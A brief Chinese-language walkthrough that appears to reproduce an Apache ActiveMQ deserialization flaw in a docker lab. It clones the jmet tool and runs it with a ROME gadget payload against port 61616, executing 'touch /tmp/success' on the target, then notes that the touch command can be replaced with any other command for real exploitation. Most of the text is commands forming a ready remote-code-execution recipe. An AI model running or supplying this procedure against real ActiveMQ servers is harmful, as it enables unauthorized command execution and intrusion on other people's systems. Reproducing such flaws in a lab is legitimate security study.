运行漏洞环境:
docker-compose up -d
环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。
下载利用工具
git clone https://github.com.cnpmjs.org/ianxtianxt/jmet.git
进入 jmet 文件
执行语句
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/success” -Yp ROME your-ip 61616
点击这个消息
目标会创建一个 success 复现成功
利用的话可以吧创建success命令换成其他的命令